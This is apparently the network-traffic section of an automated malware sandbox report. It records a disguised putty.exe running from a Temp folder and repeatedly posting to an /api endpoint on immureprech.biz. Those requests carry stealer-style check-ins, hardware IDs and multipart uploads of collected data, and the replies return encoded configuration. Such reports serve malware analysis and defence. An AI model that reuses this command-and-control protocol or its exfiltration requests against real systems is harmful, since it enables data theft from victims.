2024-12-13 15:43:51 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-13 15:43:51 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-13 15:43:52 UTC	1017	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 15:43:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eima3ucqh75fe4b8qgllsg06dv; expires=Tue, 08-Apr-2025 09:30:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hgUMp1plK%2B9QJJDPL8pICLpmIL%2Bwa0c4V0jwiy%2BQi9BMDPbkoIKJePFYpQ%2BCdZoUFVr0zqq8joSe3C8KrOyRdyc5TKK%2BVhde4%2FbiN7RIHDcGOE6LkVXhcVk0XjPtLQZqg4I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f17127b4cec42bc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2436&min_rtt=2428&rtt_var=916&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1202635&cwnd=225&unsent_bytes=0&cid=ce1f4490c23ebea1&ts=745&x=0"
2024-12-13 15:43:52 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-13 15:43:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.3	49846	172.67.207.38	443	2568	C:\Users\user\AppData\Local\Temp\putty.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:53 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 44 Host: immureprech.biz
2024-12-13 15:43:53 UTC	44	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 62 4c 37 4b 6b 2d 2d 35 35 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=BbL7Kk--55&j=
2024-12-13 15:43:54 UTC	1013	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 15:43:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vtu588dd9t4lg4g0c0fo1k1fif; expires=Tue, 08-Apr-2025 09:30:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zo8N0P1IyiDWZ%2FZLLvJI74XrsocXFvWmjLSqSysYaC5cH%2FIl%2B09bmWI71FXkPsZwWSzfFLdcQN8yyQdCklKwhiqJb45wPs1TvIGEYh%2BUeRsZJlaceEDQrBnw4ikSbtjrIUw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f171287bd5641f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1549&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=943&delivery_rate=1761158&cwnd=220&unsent_bytes=0&cid=65401d895c57087a&ts=732&x=0"
2024-12-13 15:43:54 UTC	356	IN	Data Raw: 63 63 31 0d 0a 32 42 47 4b 6c 31 48 34 65 6d 6e 50 56 38 73 49 33 72 6b 61 56 7a 6a 73 63 49 41 59 38 43 62 6d 6a 4a 67 58 6d 65 4f 61 68 72 57 6a 4d 2f 79 31 61 38 78 57 53 37 77 79 36 54 4b 71 79 32 38 79 46 4d 34 52 35 44 72 4b 51 49 66 67 36 33 4b 31 77 65 7a 72 6c 2b 4a 33 36 2f 73 69 6e 56 5a 4c 71 69 2f 70 4d 6f 58 43 4f 44 4a 57 7a 6b 71 69 66 5a 70 45 68 2b 44 36 64 76 4b 4d 36 75 72 57 73 48 33 74 2f 7a 53 62 48 67 69 6a 4f 71 35 74 75 39 68 77 4f 56 47 42 47 4f 30 36 33 41 53 44 39 72 6f 74 75 36 37 2f 38 74 53 56 63 50 6e 38 63 34 56 57 45 75 30 79 70 53 72 6b 6d 33 73 79 57 6f 41 57 35 48 4f 59 54 6f 37 6f 2b 33 50 7a 6b 2f 50 67 33 62 42 7a 37 76 34 2b 6b 67 6f 46 71 54 32 6c 61 37 48 59 4f 48 73 61 69 51 71 69 49 74 49 58 74 75 33 72 5a 4f Data Ascii: cc12BGKl1H4emnPV8sI3rkaVzjscIAY8CbmjJgXmeOahrWjM/y1a8xWS7wy6TKqy28yFM4R5DrKQIfg63K1wezrl+J36/sinVZLqi/pMoXCODJWzkqifZpEh+D6dvKM6urWsH3t/zSbHgijOq5tu9hwOVGBGO063ASD9rotu67/8tSVcPn8c4VWEu0ypSrkm3syWoAW5HOYTo7o+3Pzk/Pg3bBz7v4+kgoFqT2la7HYOHsaiQqiItIXtu3rZO
2024-12-13 15:43:54 UTC	1369	IN	Data Raw: 5a 70 54 36 69 62 36 37 51 63 54 68 58 6a 68 2f 6f 64 5a 46 45 67 2b 54 77 65 76 47 46 39 65 6e 52 75 6e 4f 6f 75 33 4f 64 41 45 76 31 64 59 70 76 72 4e 78 30 49 78 69 30 55 76 30 30 69 77 53 44 34 72 6f 74 75 34 6e 39 35 39 53 78 66 4f 76 39 4f 49 67 59 47 61 73 34 72 48 69 36 33 6e 59 2f 57 5a 77 59 37 48 79 52 54 59 2f 6e 2f 33 4c 2f 77 62 61 6b 30 4b 49 7a 73 4c 55 53 6c 78 4d 48 70 79 4b 70 4b 71 4f 56 59 58 56 64 67 6c 4b 36 4f 70 5a 46 67 4f 2f 2b 65 2f 57 46 39 4f 4c 5a 74 33 7a 75 2f 7a 4f 64 45 67 4f 6c 4e 4b 52 68 73 39 74 39 4f 46 36 49 48 75 4e 2f 30 67 72 45 36 65 49 31 6f 38 48 57 34 39 53 6f 4d 64 33 32 50 5a 51 66 48 65 30 71 35 33 50 38 33 48 52 31 41 73 34 63 35 33 57 41 52 5a 62 72 39 47 66 33 68 50 37 70 31 4c 52 7a 37 66 49 2b 6c 42 Data Ascii: ZpT6ib67QcThXjh/odZFEg+TwevGF9enRunOou3OdAEv1dYpvrNx0Ixi0Uv00iwSD4rotu4n959SxfOv9OIgYGas4rHi63nY/WZwY7HyRTY/n/3L/wbak0KIzsLUSlxMHpyKpKqOVYXVdglK6OpZFgO/+e/WF9OLZt3zu/zOdEgOlNKRhs9t9OF6IHuN/0grE6eI1o8HW49SoMd32PZQfHe0q53P83HR1As4c53WARZbr9Gf3hP7p1LRz7fI+lB
2024-12-13 15:43:54 UTC	1369	IN	Data Raw: 35 33 50 38 33 48 52 31 41 73 34 66 36 6e 2b 58 53 34 58 6b 39 48 44 78 6a 66 44 71 31 4b 68 38 37 50 55 2f 6b 68 49 47 6f 7a 47 68 59 37 66 51 66 6a 56 62 68 46 4b 73 4f 70 56 63 78 4c 61 36 51 66 79 4e 39 65 75 56 6a 33 44 6d 2b 7a 53 4d 57 42 54 6a 4c 4f 6c 74 73 4a 73 67 64 56 61 48 45 75 6c 77 6c 6b 53 44 34 2f 39 32 2f 49 4c 31 34 39 32 30 64 4f 7a 35 4f 70 63 65 43 36 6f 78 72 48 69 35 30 6e 51 35 47 73 42 53 35 57 4c 53 48 4d 54 42 2f 57 50 34 72 76 76 31 33 76 70 73 70 75 78 7a 6e 52 52 4c 39 58 57 75 62 37 54 51 66 6a 31 61 6e 42 66 73 63 5a 4e 4f 67 75 2f 33 65 66 32 42 2b 65 54 52 74 6e 50 76 38 69 47 49 48 51 32 2f 50 2b 6b 6b 2f 4e 78 67 64 51 4c 4f 4a 50 4a 74 67 31 4c 47 32 2f 6c 37 39 59 62 75 70 4d 6a 30 61 71 6a 79 50 39 70 41 53 36 59 Data Ascii: 53P83HR1As4f6n+XS4Xk9HDxjfDq1Kh87PU/khIGozGhY7fQfjVbhFKsOpVcxLa6QfyN9euVj3Dm+zSMWBTjLOltsJsgdVaHEulwlkSD4/92/IL14920dOz5OpceC6oxrHi50nQ5GsBS5WLSHMTB/WP4rvv13vpspuxznRRL9XWub7TQfj1anBfscZNOgu/3ef2B+eTRtnPv8iGIHQ2/P+kk/NxgdQLOJPJtg1LG2/l79YbupMj0aqjyP9pAS6Y
2024-12-13 15:43:54 UTC	178	IN	Data Raw: 39 42 71 4e 56 65 4b 48 75 5a 79 6d 55 37 45 6f 4c 70 79 34 38 47 67 70 4f 4b 33 66 4f 6a 32 4a 64 6f 48 52 62 52 31 72 6d 62 38 67 7a 67 35 56 49 34 64 37 6e 61 5a 54 49 58 69 39 48 4c 2b 69 50 44 73 78 62 74 33 34 50 51 39 6c 52 6b 50 71 44 43 74 62 62 6a 64 64 33 55 55 7a 68 58 36 4f 73 6f 45 71 38 6e 50 4e 39 71 37 75 50 75 5a 6f 7a 50 76 2b 58 50 43 57 41 65 75 4f 61 46 6c 75 74 4a 30 50 31 4f 46 48 75 6c 2b 6e 6b 32 42 36 50 74 77 2f 6f 44 38 36 4e 32 38 63 4f 76 36 50 4a 55 51 53 2b 4e 31 72 6e 4c 38 67 7a 67 51 54 0d 0a Data Ascii: 9BqNVeKHuZymU7EoLpy48GgpOK3fOj2JdoHRbR1rmb8gzg5VI4d7naZTIXi9HL+iPDsxbt34PQ9lRkPqDCtbbjdd3UUzhX6OsoEq8nPN9q7uPuZozPv+XPCWAeuOaFlutJ0P1OFHul+nk2B6Ptw/oD86N28cOv6PJUQS+N1rnL8gzgQT
2024-12-13 15:43:54 UTC	1369	IN	Data Raw: 33 63 35 62 0d 0a 59 55 63 35 44 71 4e 43 70 32 75 2f 58 6d 37 32 62 6a 6f 33 72 78 31 37 66 6b 79 6e 42 41 4f 70 54 47 6f 62 4c 72 59 64 7a 46 66 6a 78 33 6d 64 70 78 4f 68 65 2f 32 66 76 53 4b 2f 61 53 5a 2b 6e 54 77 74 57 76 61 4b 51 69 37 49 72 6c 6d 2f 4d 51 32 4c 42 71 4a 48 71 49 69 30 6b 57 57 35 50 42 37 2f 6f 37 39 35 39 69 39 66 75 37 35 4f 5a 4d 51 44 61 49 38 75 32 6d 77 31 58 38 37 56 6f 41 66 36 48 6d 66 42 4d 71 75 2f 57 32 37 32 62 6a 49 30 4c 64 64 34 2f 6b 30 32 67 64 46 74 48 57 75 5a 76 79 44 4f 44 6c 51 67 68 76 69 63 35 64 4d 6a 2b 66 2f 64 50 43 45 2b 2b 4c 61 74 58 72 36 2f 7a 43 55 47 77 65 68 4d 36 68 70 72 74 4e 78 64 52 54 4f 46 66 6f 36 79 67 53 6c 34 50 64 68 2f 4a 47 34 2b 35 6d 6a 4d 2b 2f 35 63 38 4a 59 43 4b 77 36 71 6d Data Ascii: 3c5bYUc5DqNCp2u/Xm72bjo3rx17fkynBAOpTGobLrYdzFfjx3mdpxOhe/2fvSK/aSZ+nTwtWvaKQi7Irlm/MQ2LBqJHqIi0kWW5PB7/o7959i9fu75OZMQDaI8u2mw1X87VoAf6HmfBMqu/W272bjI0Ldd4/k02gdFtHWuZvyDODlQghvic5dMj+f/dPCE++LatXr6/zCUGwehM6hprtNxdRTOFfo6ygSl4Pdh/JG4+5mjM+/5c8JYCKw6qm
2024-12-13 15:43:54 UTC	1369	IN	Data Raw: 64 58 4f 4a 41 4f 78 71 30 6c 76 4b 39 37 70 79 39 38 47 67 70 4e 4f 77 66 4f 7a 79 50 35 77 64 44 61 41 30 70 6d 75 38 31 48 77 2b 55 34 67 54 37 33 2b 66 51 4a 62 6b 38 58 72 33 69 50 54 70 6c 2f 51 7a 37 2b 31 7a 77 6c 67 36 6f 44 75 6e 62 61 71 62 5a 33 74 44 7a 68 58 75 4f 73 6f 45 68 65 4c 31 64 76 53 43 2b 2b 58 64 71 47 48 6b 2f 44 75 66 46 41 43 6a 4d 37 74 73 73 39 4a 37 4e 6c 4f 4a 47 75 35 77 6b 55 50 45 6f 4c 70 79 34 38 47 67 70 50 53 74 59 2b 57 31 4c 4e 51 42 53 36 6f 35 36 54 4c 38 30 33 55 39 55 49 6f 56 37 33 32 55 54 5a 62 6e 2f 33 76 37 68 66 50 72 30 62 35 77 36 4f 63 31 6e 68 41 49 6f 44 69 6e 61 62 69 62 4e 6e 56 64 6c 6c 4b 36 4f 71 42 4a 69 76 58 31 63 75 71 4c 75 50 75 5a 6f 7a 50 76 2b 58 50 43 57 41 2b 6a 4a 36 4a 72 74 39 42 Data Ascii: dXOJAOxq0lvK97py98GgpNOwfOzyP5wdDaA0pmu81Hw+U4gT73+fQJbk8Xr3iPTpl/Qz7+1zwlg6oDunbaqbZ3tDzhXuOsoEheL1dvSC++XdqGHk/DufFACjM7tss9J7NlOJGu5wkUPEoLpy48GgpPStY+W1LNQBS6o56TL803U9UIoV732UTZbn/3v7hfPr0b5w6Oc1nhAIoDinabibNnVdllK6OqBJivX1cuqLuPuZozPv+XPCWA+jJ6Jrt9B
2024-12-13 15:43:54 UTC	1369	IN	Data Raw: 52 4c 70 63 35 4e 43 67 65 54 78 63 2f 61 43 2f 75 4b 58 39 44 50 76 37 58 50 43 57 43 75 32 4f 4b 56 74 2f 4d 51 32 4c 42 71 4a 48 71 49 69 30 6b 2b 49 36 76 31 31 39 6f 4c 77 34 64 4f 77 64 75 6a 39 49 5a 49 59 44 4c 38 6e 71 57 4f 35 31 33 73 31 58 6f 67 62 35 48 6d 57 42 4d 71 75 2f 57 32 37 32 62 6a 4a 32 37 31 61 37 2b 35 7a 68 56 59 53 37 54 4b 6c 4b 75 53 62 65 54 35 51 67 52 2f 68 66 4a 46 50 67 65 54 37 63 76 4f 4d 36 75 66 59 74 58 66 6f 2b 6a 57 63 47 51 53 72 4d 71 42 72 74 4e 77 34 65 78 71 4a 43 71 49 69 30 6d 71 44 37 66 34 31 35 4d 2f 68 70 4e 43 32 4d 37 43 31 4d 35 41 53 41 61 4d 31 72 6e 69 36 30 6e 67 32 53 49 30 55 36 6e 79 65 53 49 6e 6d 38 33 58 2b 69 76 58 76 32 72 78 7a 34 2f 52 7a 31 46 67 4d 74 58 58 78 4b 6f 33 57 64 6a 46 55 Data Ascii: RLpc5NCgeTxc/aC/uKX9DPv7XPCWCu2OKVt/MQ2LBqJHqIi0k+I6v119oLw4dOwduj9IZIYDL8nqWO513s1Xogb5HmWBMqu/W272bjJ271a7+5zhVYS7TKlKuSbeT5QgR/hfJFPgeT7cvOM6ufYtXfo+jWcGQSrMqBrtNw4exqJCqIi0mqD7f415M/hpNC2M7C1M5ASAaM1rni60ng2SI0U6nyeSInm83X+ivXv2rxz4/Rz1FgMtXXxKo3WdjFU
2024-12-13 15:43:54 UTC	1369	IN	Data Raw: 33 43 46 70 75 67 34 7a 58 74 77 61 43 32 6d 66 70 68 71 4b 31 7a 33 52 73 5a 76 7a 4f 71 66 4c 2b 63 52 67 74 39 6c 42 2f 6b 62 59 4e 36 75 75 6e 67 65 50 32 57 36 61 6a 43 75 58 33 6d 38 69 58 61 56 6b 75 69 64 66 46 54 2f 4a 4d 34 43 68 54 4f 43 71 49 69 30 6e 47 48 34 50 52 79 37 5a 43 31 77 38 32 33 64 66 2f 6b 63 39 52 59 44 65 31 74 2b 53 54 38 33 32 6c 31 41 74 35 41 75 53 2f 42 45 39 53 38 35 54 76 69 77 65 36 6b 6a 2b 67 39 71 4f 64 7a 77 6c 68 4d 72 69 65 37 62 4c 2f 4e 65 33 4a 6b 73 44 7a 6c 66 4a 64 44 6c 4b 7a 55 66 75 2b 47 75 4b 71 58 74 54 4f 77 7a 48 50 53 57 44 54 6a 64 62 45 71 35 4a 74 4e 4e 6c 53 41 46 66 52 72 33 32 71 44 36 50 39 79 36 38 50 57 37 38 4f 39 4d 36 61 31 4e 64 70 41 57 2b 4e 31 72 58 76 38 67 79 68 6e 41 64 74 42 74 Data Ascii: 3CFpug4zXtwaC2mfphqK1z3RsZvzOqfL+cRgt9lB/kbYN6uungeP2W6ajCuX3m8iXaVkuidfFT/JM4ChTOCqIi0nGH4PRy7ZC1w823df/kc9RYDe1t+ST832l1At5AuS/BE9S85Tviwe6kj+g9qOdzwlhMrie7bL/Ne3JksDzlfJdDlKzUfu+GuKqXtTOwzHPSWDTjdbEq5JtNNlSAFfRr32qD6P9y68PW78O9M6a1NdpAW+N1rXv8gyhnAdtBt
2024-12-13 15:43:54 UTC	1369	IN	Data Raw: 53 2f 75 31 36 74 4b 2f 4f 78 65 6d 45 5a 75 76 37 50 5a 30 4f 47 75 31 37 36 57 58 38 67 30 46 31 45 73 34 74 72 44 71 4b 42 4e 79 75 7a 33 62 31 6a 2f 2f 79 78 76 64 55 35 76 49 79 6a 41 67 63 6f 6e 71 48 58 4a 32 62 4e 6e 56 63 7a 6b 71 77 4e 4e 4a 41 6c 61 36 69 4a 61 6e 61 72 62 65 41 36 69 48 33 75 79 72 61 44 6b 76 31 5a 2b 63 71 72 70 73 67 64 52 32 4e 41 50 42 38 6b 56 4b 48 71 63 52 4c 33 49 2f 2f 35 63 47 71 66 75 54 55 4d 49 73 53 4e 5a 4d 67 71 6d 53 79 33 47 34 6b 47 73 42 53 37 54 72 4b 66 63 53 6d 75 6b 71 31 77 65 43 6b 6a 2f 70 47 36 2f 73 39 6e 51 34 61 34 42 4b 6e 62 62 33 4e 61 44 68 57 72 78 48 7a 63 4e 49 4b 78 4f 69 36 4c 61 6e 50 75 4f 44 47 2b 69 75 34 70 32 6a 50 53 31 7a 39 5a 37 59 6b 70 5a 74 75 64 51 4c 63 58 4b 4a 6f 30 68 Data Ascii: S/u16tK/OxemEZuv7PZ0OGu176WX8g0F1Es4trDqKBNyuz3b1j//yxvdU5vIyjAgconqHXJ2bNnVczkqwNNJAla6iJanarbeA6iH3uyraDkv1Z+cqrpsgdR2NAPB8kVKHqcRL3I//5cGqfuTUMIsSNZMgqmSy3G4kGsBS7TrKfcSmukq1weCkj/pG6/s9nQ4a4BKnbb3NaDhWrxHzcNIKxOi6LanPuODG+iu4p2jPS1z9Z7YkpZtudQLcXKJo0h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.3	49852	172.67.207.38	443	2568	C:\Users\user\AppData\Local\Temp\putty.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:55 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FW07QUAK775XPOAJPJT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12865 Host: immureprech.biz
2024-12-13 15:43:55 UTC	12865	OUT	Data Raw: 2d 2d 46 57 30 37 51 55 41 4b 37 37 35 58 50 4f 41 4a 50 4a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 34 46 31 35 30 32 44 34 33 42 35 33 30 34 41 41 38 44 45 31 36 41 31 34 35 43 34 33 37 45 38 0d 0a 2d 2d 46 57 30 37 51 55 41 4b 37 37 35 58 50 4f 41 4a 50 4a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 57 30 37 51 55 41 4b 37 37 35 58 50 4f 41 4a 50 4a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 35 35 Data Ascii: --FW07QUAK775XPOAJPJTContent-Disposition: form-data; name="hwid"64F1502D43B5304AA8DE16A145C437E8--FW07QUAK775XPOAJPJTContent-Disposition: form-data; name="pid"2--FW07QUAK775XPOAJPJTContent-Disposition: form-data; name="lid"BbL7Kk--55
2024-12-13 15:43:57 UTC	1012	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 15:43:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3icbsom1gsp45ac8ri65k6ti6k; expires=Tue, 08-Apr-2025 09:30:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZUuCUMCLPYvqOo0Ho3p6yNiLwnUlloYR1psGDfqqFRmraVSfbbpunihZltnnzCoYU7ppw3dnVlLRAdVXUIvRKFd2fDDAPNQLC5uzT6H9nlj0cOSg82JPPJv0zOf3iW8pFKw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1712974e38447a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13509&min_rtt=1611&rtt_var=7791&sent=12&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13805&delivery_rate=1812538&cwnd=232&unsent_bytes=0&cid=c89342b73a576494&ts=1538&x=0"
2024-12-13 15:43:57 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-13 15:43:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.3	49859	172.67.207.38	443	2568	C:\Users\user\AppData\Local\Temp\putty.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:58 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NP9E13TDL7CB6FXGB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12101 Host: immureprech.biz
2024-12-13 15:43:58 UTC	12101	OUT	Data Raw: 2d 2d 4e 50 39 45 31 33 54 44 4c 37 43 42 36 46 58 47 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 34 46 31 35 30 32 44 34 33 42 35 33 30 34 41 41 38 44 45 31 36 41 31 34 35 43 34 33 37 45 38 0d 0a 2d 2d 4e 50 39 45 31 33 54 44 4c 37 43 42 36 46 58 47 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 50 39 45 31 33 54 44 4c 37 43 42 36 46 58 47 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 35 35 0d 0a 2d 2d 4e 50 Data Ascii: --NP9E13TDL7CB6FXGBContent-Disposition: form-data; name="hwid"64F1502D43B5304AA8DE16A145C437E8--NP9E13TDL7CB6FXGBContent-Disposition: form-data; name="pid"2--NP9E13TDL7CB6FXGBContent-Disposition: form-data; name="lid"BbL7Kk--55--NP
2024-12-13 15:43:59 UTC	1014	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 15:43:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rfh7d4ck5a834hso7mqno5pbef; expires=Tue, 08-Apr-2025 09:30:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eQ%2Ft8nsvjroU39olgL9jpencA68GRPMYao3WZMplOCQ7NRfGeXhmTG%2Fcj9W2C5tkTcc4vQ2Q5ktVR2CYbDtqyWW7UXzo1ab0ri8YpZsd6A5jnLK%2FrVUmuao8UzHsXVrFXjw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1712a838561891-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1709&rtt_var=854&sent=13&recv=19&lost=0&retrans=1&sent_bytes=4218&recv_bytes=13039&delivery_rate=316805&cwnd=172&unsent_bytes=0&cid=e645abb87af994ff&ts=808&x=0"
2024-12-13 15:43:59 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-13 15:43:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.3	49865	172.67.207.38	443	2568	C:\Users\user\AppData\Local\Temp\putty.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:44:00 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=31408WAQ67L User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20411 Host: immureprech.biz
2024-12-13 15:44:00 UTC	15331	OUT	Data Raw: 2d 2d 33 31 34 30 38 57 41 51 36 37 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 34 46 31 35 30 32 44 34 33 42 35 33 30 34 41 41 38 44 45 31 36 41 31 34 35 43 34 33 37 45 38 0d 0a 2d 2d 33 31 34 30 38 57 41 51 36 37 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 33 31 34 30 38 57 41 51 36 37 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 35 35 0d 0a 2d 2d 33 31 34 30 38 57 41 51 36 37 4c 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --31408WAQ67LContent-Disposition: form-data; name="hwid"64F1502D43B5304AA8DE16A145C437E8--31408WAQ67LContent-Disposition: form-data; name="pid"3--31408WAQ67LContent-Disposition: form-data; name="lid"BbL7Kk--55--31408WAQ67LContent
2024-12-13 15:44:00 UTC	5080	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 dd 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 2b 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 75 47 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 ae 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 1d 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 ba a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: sQ0u+4uG([:s~X`nO
